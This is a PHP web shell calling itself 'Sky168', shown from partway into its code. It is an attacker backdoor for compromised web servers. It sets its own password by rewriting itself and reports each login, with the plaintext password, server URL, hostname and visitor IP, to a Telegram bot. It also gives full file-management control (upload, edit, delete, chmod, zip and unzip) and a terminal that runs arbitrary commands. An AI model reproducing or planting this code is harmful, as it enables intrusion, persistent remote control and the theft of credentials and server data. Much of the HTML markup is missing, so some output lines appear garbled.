TELEGRAM_CHAT_ID,'text'=>$msg,'parse_mode'=>'HTML']; $opts = ["http"=>[ "header"=>"Content-Type: application/x-www-form-urlencoded\r\n", "method"=>"POST", "content"=>http_build_query($data), "timeout"=>5 ]]; @file_get_contents($url,false,stream_context_create($opts)); } // Fungsi untuk mengganti nilai PASSWORD di file ini function setPasswordInFile($new_pass){ $file = __FILE__; $content = file_get_contents($file); $pattern = "/define\('PASSWORD',\s*'.*?'\);/"; $replacement = "define('PASSWORD', '".$new_pass."');"; $content = preg_replace($pattern, $replacement, $content, 1); file_put_contents($file, $content); } /* ======= AUTH ======= */ if (empty(PASSWORD)) { if ($_SERVER['REQUEST_METHOD']==='POST' && isset($_POST['new_pass'])){ $new_pass = trim($_POST['new_pass']); if($new_pass !== ''){ setPasswordInFile($new_pass); $_SESSION['logged_in'] = true; $_SESSION['shell_token'] = bin2hex(random_bytes(16)); header('Location: '.$_SERVER['PHP_SELF']); exit; } } echo 'Set Password'; echo '

āš ļø Set Password

'; echo ''; echo '
'; exit; } else { $current_password = PASSWORD; if (!is_logged_in()) { if ($_SERVER['REQUEST_METHOD']==='POST' && isset($_POST['pass'])) { $input_pass = $_POST['pass']; if($input_pass === $current_password){ $_SESSION['logged_in'] = true; $_SESSION['shell_token'] = bin2hex(random_bytes(16)); $urlLogin = (isset($_SERVER['HTTPS'])?'https':'http')."://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; $ip = $_SERVER['REMOTE_ADDR'] ?? 'n/a'; $server = php_uname('n'); $msg = "āœ… Login Berhasil\nšŸ“Œ URL: {$urlLogin}\n🌐 IP: {$ip}\nšŸ–„ļø Server: {$server}\nšŸ”‘ Password: {$input_pass}\nā° ".date('Y-m-d H:i:s'); sendTelegram($msg); header('Location: '.$_SERVER['PHP_SELF']); exit; } else { $msg_fail = "āš ļø Login Gagal\n🌐 IP: {$_SERVER['REMOTE_ADDR']}\nšŸ”‘ Password Dicoba: {$input_pass}\nā° ".date('Y-m-d H:i:s'); sendTelegram($msg_fail); } } echo 'Login'; echo '
'; echo '
'; exit; } } /* ===== FILE MANAGER + TERMINAL ===== */ $cwd = isset($_GET['d']) ? realpath($_GET['d']) : ROOT_PATH; if (!$cwd) $cwd = ROOT_PATH; if (isset($_GET['logout'])) { session_destroy(); header('Location: '.$_SERVER['PHP_SELF']); exit; } // Handle actions if (isset($_POST['newfile'])) file_put_contents($cwd.'/'.basename($_POST['newfile']), ''); if (isset($_POST['newfolder'])) mkdir($cwd.'/'.basename($_POST['newfolder'])); if (isset($_POST['savefile']) && isset($_POST['filename'])) file_put_contents($cwd.'/'.basename($_POST['filename']), $_POST['content']); if (isset($_GET['delete'])) { $t=$cwd.'/'.basename($_GET['delete']); is_dir($t)?@rmdir($t):@unlink($t); } if (isset($_GET['download'])) { $f=$cwd.'/'.basename($_GET['download']); if(is_file($f)){header('Content-Type: application/octet-stream');header('Content-Disposition: attachment; filename="'.basename($f).'"');header('Content-Length: '.filesize($f));readfile($f);exit;} } if (!empty($_FILES['upload']['name'])) move_uploaded_file($_FILES['upload']['tmp_name'], $cwd.'/'.basename($_FILES['upload']['name'])); if (isset($_POST['zip']) && !empty($_POST['files'])){ $zipname=$cwd.'/'.basename($_POST['zip']).'.zip'; $zip=new ZipArchive; if($zip->open($zipname,ZipArchive::CREATE)===TRUE){ foreach($_POST['files'] as $f){ $p=$cwd.'/'.basename($f); if(is_file($p)) $zip->addFile($p,basename($p)); } $zip->close(); } } if(isset($_POST['unzip'])){ $file=$cwd.'/'.basename($_POST['unzip']); $zip=new ZipArchive; if(is_file($file) && $zip->open($file)===TRUE){$zip->extractTo($cwd);$zip->close();} } // UI $user_server = get_current_user(); $whoami = trim(shell_exec('whoami')); $server_software = $_SERVER['SERVER_SOFTWARE'] ?? 'n/a'; $os_info = php_uname(); echo 'Sky168 '; echo "

Sky168 [Keamanan Hanyalah Sebuah Ilusi !!!]

"; echo "

šŸ‘¤ User: {$user_server} ({$whoami})
šŸ–„ Server: {$server_software}
šŸ’» OS: {$os_info}

"; echo "

Logout

"; // Breadcrumb path klik cepat $pathParts = explode(DIRECTORY_SEPARATOR, $cwd); $accPath = ''; echo ''; echo "
šŸ“„ Upload: āž• File: āž• Folder: Zip name:
"; $items = scandir($cwd); echo "
"; $parent = dirname($cwd); if ($parent !== $cwd) echo ""; foreach ($items as $f) { if ($f == '.' || $f == '..') continue; $full = realpath($cwd . '/' . $f); $name = esc($f); $perm = substr(sprintf('%o', fileperms($full)), -4); $owner = function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($full))['name'] : 'n/a'; $date = date('Y-m-d H:i:s', filemtime($full)); if (isset($_POST['chmod']) && isset($_POST['chmod_value']) && $_POST['chmod']==$name){ $mode=intval($_POST['chmod_value'],8); @chmod($full,$mode); $perm=substr(sprintf('%o',fileperms($full)),-4); } if (is_dir($full)) { echo ""; } else { echo ""; } } // Edit file if(isset($_GET['edit'])){ $file=$cwd.'/'.basename($_GET['edit']); if(is_file($file)){ $content=file_get_contents($file); echo "

āœļø Edit File: ".esc($_GET['edit'])."

"; } } // Terminal if(ENABLE_SHELL){ echo "

šŸ’» Terminal

"; if(!empty($_POST['cmd'])){ $cmd=$_POST['cmd']; $descriptors=[1=>['pipe','w'],2=>['pipe','w']]; $proc=proc_open($cmd,$descriptors,$pipes,$cwd); if(is_resource($proc)){ stream_set_timeout($pipes[1],SHELL_TIMEOUT_SEC); $out=stream_get_contents($pipes[1],SHELL_MAX_BYTES); fclose($pipes[1]); $err=stream_get_contents($pipes[2],SHELL_MAX_BYTES); fclose($pipes[2]); proc_close($proc); echo "
".esc($out.$err)."
"; } } } echo "
NameSizePermissionOwnerDate ModifiedAction
.. (up)
šŸ“ $namedir$perm$owner$dateāŒ Delete |
šŸ“„ $name".filesize($full)."$perm$owner$dateāœļø Edit | šŸ“„ Download | āŒ Delete | "; if (preg_match('/\.zip$/i',$f)) echo " | "; echo "
"; ?>